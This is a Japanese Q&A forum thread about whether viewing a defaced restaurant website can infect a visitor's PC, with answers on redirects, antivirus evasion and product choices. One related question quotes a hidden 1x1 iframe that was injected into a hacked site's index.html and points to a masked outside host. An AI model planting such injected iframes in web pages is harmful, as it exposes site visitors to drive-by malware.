- 締切済み
改ざんされたページへのアクセス
ラーメン屋のメニューのページを「お気に入り」登録しており、 そこから「TOPに戻る」のリンクを押したら、ページ全体はロシア語で、 一部英語で「F***ing Yahoo web hosting」(伏字)といった中傷が 書かれた赤と黒の毒々しいデザインのページが表示されました。 アドレスバーに表示されているのは間違いなく、そのラーメン屋 の独自ドメインのものでした。 訳がわからずとにかくPCオフラインにしてウィルスチェックしたものの とりあえずは問題ないようでした(ソースネクスト社のソフト使用)。 オフラインコンテンツとしてページをもう一度見ようとしたら、 なにも表示されませんでした(HTMLのソースも2,3行しかありませんでした) 改ざんされたページへのアクセスでなにかウィルスに感染したりと いうことはあるのでしょうか? ウィルスソフトで見つけられない 害というのもありえますか?
- wind_hum
- お礼率76% (50/65)
- ウィルス・マルウェア
- 回答数3
- ありがとう数3
- みんなの回答 (3)
- 専門家の回答
みんなの回答
- waros99
- ベストアンサー率29% (162/544)
#2です。 ボクは総合対策ソフトではKasperskyがお薦めですけど。 あと、ノートン先生はまた何かやらかしちゃったようですよ。 http://news.yahoo.com/s/zd/20071206/tc_zd/221141;_ylt=A0WTcVSHAllHK0YAFyAjtBAF
- waros99
- ベストアンサー率29% (162/544)
こんにちは。 ボクはその筋のコミュニティーの潜入調査やVirtual Machine上でAVのスキャンやPFWの検知を欺くMalwareの動作解析みたいなことをやってます。 >改ざんされたページへのアクセスでなにかウィルスに感染したりと いうことはあるのでしょうか? はい、ありますよ。クラッカーが任意に用意したサイトにリダイレクトさせることだってぜんぜんあり得るわけだし。 >ソースネクスト社のソフト使用 大手の製品と比べると、かなり信頼性劣りますよ。 >ウィルスソフトで見つけられない 害というのもありえますか? はい、本来検出できる筈の既知のMalwareであっても、改変を加えることによって検出をすり抜けてしまうといったことが効いてしまう場合があります。
補足
詳しいご返信ありがとうございます。 実は値段も安いこともあり ちょと心配になり、ウィルスソフト名も書きました。 …やはり廉価なりに性能の差はあるのですね… さしつかえなければもう1点だけ教えていただきたいのですが、 改ざんページへのアクセスなど気になる過去の出来事がある場合、 素人が取れる解決方法ってOSのクリーンインストールくらいしか 方法はないでしょうか…? または信頼のおけるウィルスソフトに変更、スキャンするだけでも かなり違うのでしょうか。 ## ノートン先生か…あとは最近駅などの広告ででてる 「カペルスキー」なるソフトが気になっています
- takepon256
- ベストアンサー率41% (391/936)
もしかして、これですかね? http://www.atmarkit.co.jp/fnetwork/rensai/troutol11/01.html まぁHP自体がのっとられている可能性も否定は出来ませんので、ご参考まで。
補足
レスポンスありがとうございます。 仕組みについてたいへん勉強になりました。 ページを見たPC側のウィルス感染の有無が気になっているのですが、 これは表示されたコンテンツ次第なのでしょうか…?
関連するQ&A
- 不正アクセスの改ざんとは?
この頃、FC2のファイルマネージャーに「最近ホームページにてiframeタグによる改ざんによりウィルスが埋め込まれてしまうサイトが増えております。」というお知らせが出ているのですが、この場合のiframeタグ(ログ?)の改ざん/書き換えというのは具体的にどのようなことなのでしょうか。 ・自分が掲載しているサイト内の写真や文章が書き換えられるという意味ではないですか? ・例えばTOPページで改ざんをされても、新たにTOPページをアップロードすれば、それは消え(上書きされ)ますか? ・そもそも改ざんは初心者が目で見てわかる場所(ソースなど)ではないのでしょうか? ・また現在、運営していなくても、ネット上にHPがあれば脅威に晒されますか? 以前にこの件を検索したとき、主な対処はプロバイダがするので個人では気にしても仕方がない、というような記事を見かけました。 ウィルスチェックをこまめにしておけばいいのかぐらいに思っていたのですが、先日、とある個人HPの方が「不正アクセスでログの改ざんが見つかったので閉鎖します」と告知を出していたので、他人事ではないのかもと不安になりました。 閉鎖をした管理人さんは、どのように改ざんを見つけたのか気になっていますが、もうコンタクトも取れないので確かめようもないです。 自分なりに改めて検索したのですが、警告や結果のニュースばかりで知りたい基本的なところがわかりませんでした。 恐縮ですが「不正アクセスの改ざん/書き換え」について、わかりやすく教えていただけたらと思います。
- ベストアンサー
- ウィルス・マルウェア
- ホームページ改ざんのCHECK方法
ホームページが不正アクセスによって改ざんされ、そのページの閲覧者にもウィルスが感染してしまうウィルスがあることを知りました。さっそく、自分のウェブページのソースを調べたのですが、編集用として自分のパソコンにおいてあるソースにはない訳のわからない文字列があります。これは改ざんされてる!と思ったので、この文字列のないソースをUPし直したら、やっぱり、その文字列が追加されてしまいます。考えると、これは広告のソースなのかな?とふと思いました。素人なので、自分のホームページが改ざんされているのかどうかがわかりません。ソースを調べる意外に確認方法ってありますか?
- ベストアンサー
- ウィルス・マルウェア
- 改ざん 至急お願いします><
改ざんされているサイトを閲覧してしまったかもしれません>< 改ざんされていた期間が1月4日から1月5日らしいのですが、そのサイトが改ざんされていたことを今知りました>< Gumblarという亜種らしいです。。。。。 今日まで普通にネットでクレジットカードで買い物をしていました(泣) PCはvistaで、ウイルス対策ソフトはWebroot spy sweeper with antivirusでファイアウォールはwindows ファイアウォール(vista)です。 これまでおかしいと思ったことは (1)この前、IEを起動したときにウインドウの縦の長さが少し短くなっていてたこと。(しかし次の日直っていた) ぐらいです。 (2)今なのですが、gooメールを見た後にgooのtopのボタンを押したら、小さい窓で「http://goo.ne.jp」は開けません的なことが表示され、OKを押したら、IEではこのページは表示されませんと表示されました。 adobe reader は最新なのですが、フラッシュ player?は最新かどうかまだ確認できてません。 windowsアップデートは最新の状態にしているのですが、phish wall は最新の状態ではありません>< やはりウイルス感染しているのでしょうか? オンラインスキャンで調べたいのですが、どこがいいでしょうか? 今までOCNのオンラインスキャンとf-secureのオンラインスキャンしか使ったことがないのですが、この二つのオンラインスキャンだけでウイルス(Gumblar)は発見できますか? また、そのサイトをIEのお気に入りに入れているのですが、消したほうがいいですか?
- ベストアンサー
- ウィルス・マルウェア
- <iframe>を使ったページ改ざんにあいました。対策をご教授お願いいたします。
初めて、質問をさせていただきます。 WEB関係の仕事をしていながら大変お恥ずかしいのですが、 アタックにより、管理しているウェブサイトの一部が改ざんされました。 (現象) 具体的には、「index.html」と名づけされたファイルの ソース最終部分に、以下のコードが追記されていました。 【URLは念のため、書き換えています】 <iframe src="?http://***.net/?click=D1A4LDM"? width=1 height=1 style="visibility:hidden;position:absolute"></iframe> ※他ファイル名は、拡張子が「html」であっても一切被害なし ※私は直接アクセスしていませんが、他担当によると、 本ドメインに接続すると、ブラウザクラッシュしたとの報告がありました。 ※click=以降の英数7文字は、乱数により各ページに異なった文字が記載 また、書き換えられたファイルのタイムスタンプを確認し、 該当時間のftpサーバログを調べると、社内IPからの接続形跡があり、 今回、改ざんされていた該当ファイルの書き換え履歴がありました。 現在、全ファイルの該当箇所を削除し、再アップロード。 また、利用していたFTPアカウントを廃止し、新規FTPアカウントを発行しました。 IDCには、サーバがクラックされた可能性がないが調査依頼し、 現在のところ、調査中です。 (ウイルスの疑いと、発見・駆除) ただ、その時間帯に誰もFTPを行っていなかったため、 ウイルスの可能性が考えられ、対策ソフトでスキャンしたところ、 1台より、W32.Sality.AM というウイルスが検出され、駆除しました。 ?http://www.threatexpert.com/report.aspx?md5=25583fd04e8f408a56f30ba...? しかし、ウイルスの性質を見ても、ftpアカウントを盗聴し、 特定サイトに接続し、index.htmlファイルをダウンロード、改ざん、アップロードする・・といった行為を 働くようなことは記載されていませんでした。 (皆様へご相談) FTPログに社内IPからのFTP接続履歴があったため、我々のセキュリティに問題があったことを 推測しているのですが、ウイルスレポートからも、発見されたウイルスが、現象を引き起こしたとは 特定しにくいと感じております。 そのため、ウイルス対策ソフトでは特定できない別のウイルスに感染している可能性を考えております。 国内のQ&Aサイトでは、同様の現象を発見できなかったため、 海外の掲示板を見たところ、同様の現象を発見したのですが、 原因までは特定されていませんでした。 そこで、ご存知の方がいらっしゃいましたらお知恵を拝借させていただきたいのですが、 本件の原因は何によるものでしょうか? また、書き換えられた箇所削除・FTPアカウント変更の他にすべき対策や、 今後のための予防措置などあれば、アドバイスいただけますと有難く存じます。 何卒、宜しくお願いいたします。
- ベストアンサー
- ウィルス・マルウェア
- ドメインから元のホスティングURLを知るには?
例えば、www.aaa.co.jp/ で表示されるサイトがあるとして、ページをあちこち見ていくと、 www.aaa.co.jp/bbb.htmlとか、www.aaa.co.jp/ccc/ddd.htmlという風にアドレスバーにも表示されますよね。 でも、本当は、www.hosting.ne.jp/~user/を、ドメインで表示できるように飛ばしているんだと思うんですが。 今、www.aaa.co.jp/ だけが分かっていて、そこから何処のホスティングを利用していてユーザー名を知りたい時は、どんな風にすれば良いのでしょうか? 逆引きでWhoisから、IPアドレス→それをアドレスバーに突っ込んだら、ホスティングサービス会社のトップに転送、の所までは出来ました。 自分が今使っているホスティング会社を気に入っているので、ドメインを取って登録(転送)してもらおうと思っているのですが、じゃあもう誰にも今のホスティングサーバー名やユーザー名はバレないのかな、という所から始まった疑問です。 よろしくお願いします。
- 締切済み
- ハードウェア・サーバー
- ページがひょうじできません
ネットで他のホームページは完璧に表示出来るのに 2チャンネルの掲示板だけ 「ページが表示出来ません」と出ます。 しかし、何故か深夜と早朝だけ繋がります。 一番盛り上がる時に必ずエラーが発生します。 書き込みが混み合うとパソコンがフリーズします。 ウイルスソフト「ソースネクストのウイルスセキュリティ」に 問題があるとプロバイダの方から指摘がありました。 自分とプロバイダで出来る事は全て改善しましたが 治りません。
- ベストアンサー
- ブラウザ
- ページ移動してもURLをtopのままにするタグ
企業のHP等でたまにあるのですが、 「サイト内の別のページへ移動しても、アドレスバーに表示されるURLは常にtopのまま」 このタグを教えてください。 別のページをブックマークしても、必ずtopに繋がるようにできていました。 ソースを見てもいまいちわかりません。 どこに打てばいいのかも教えてください。
- ベストアンサー
- HTML
- 存在しないURLでアクセスしても表示されてしまう
WordpressでHpを公開していますが、存在しないURLを入力しても404エラーが表示されず、トップページに近いページが表示されます。 近いというのは、テーマで設定している要素(ロゴ)だけが表示されないトップページなのです。 例えばトップページのURLがhttps://tatoeba.jpの場合、ブラウザのアドレスバーにhttps://tatoeba.jp/hogehogeと入力した場合、アドレスバーのURLはそのまま表示された状態で、トップページに近いレイアウトのページ(ロゴが無い)が表示されます。 タブの表示は本来wordpressの一般設定で指定したサイトのタイトルとキャッチフレーズが "タイトル -キャッチフレーズ" の順で表示されるところが、 "ページが見つかりませんでした -タイトル" と表示されています。 ソースを見ても、<title>ページが見つかりませんでした – タイトル</title>となっています。 404エラーページを表示させるにはどのようにしたらよいのでしょうか?
- ベストアンサー
- ホームページ作成ソフト
- インターネットでリンクページがみれません。
困っています。お分かりになる方がいらっしゃいましたら どうぞよろしくお願いいたします。 会社のパソコンでホームページを閲覧していて、指のマークが表示されたので そのリンク先ページを見ようとクリックを試みると、 新しいウィンドウが表示されるように作成してあるHPだけ、 リンク先を見ることができません。 たとえば、gooのトップページから教えてgooにはいる時など ページが切り替わる場合は閲覧できます。 上記のような内容なので、指マークのところで右クリックして ショートカットメニューから「新しいウィンドウで開く」をクリックしても 何の反応もありませんでした。 そのとき、ステータスバーにはリンク先のアドレスが表示されるだけで エラーのメッセージもまったく表示されません。 再起動してパソコンをリフレッシュしてもなおりませんし、 会社なのですが、オフラインも疑ってみたのですが、 ちゃんとつながってました。 ちなみに、リンク先のURLをアドレスバーに入力したときは そのページを見れたので、リンクが切れてるとかも無いようです。 いろいろ検索して、新しいウィンドウがでるHPを探して試して みたのですが、やはり、表示されませんでした。 どなたかこのような現象をご経験された方いらっしゃいますか? それか、もとのようにもどす方法をご存知の方いましたら ご回答よろしくお願いいたします。 なお、会社なので、ソフトを再インストールなどは個人では できないです。
- ベストアンサー
- オフィス系ソフト
- ページがうまく表示されない。
最近なんですけど、HPを見て回っている時、 ページが重たい訳ではないのに表示されないんです。 次のページに移動する時も押しても表示されなかったりして。 ずっと読み込んだままの時もありました。 こんな事は今まで一度も無かったのでウイルスだと思い、 ウイルスソフトで完全スキャンしたけど出てこなくて。 自分のHPすらちゃんと表示されなくて困っています。 これは何故なのでしょうか??教えてください。
- ベストアンサー
- その他(インターネット接続・通信)
お礼
追記いただきありがとうございました。 OSの再インストールをして、ウィルスソフトも変更を検討しようと思います。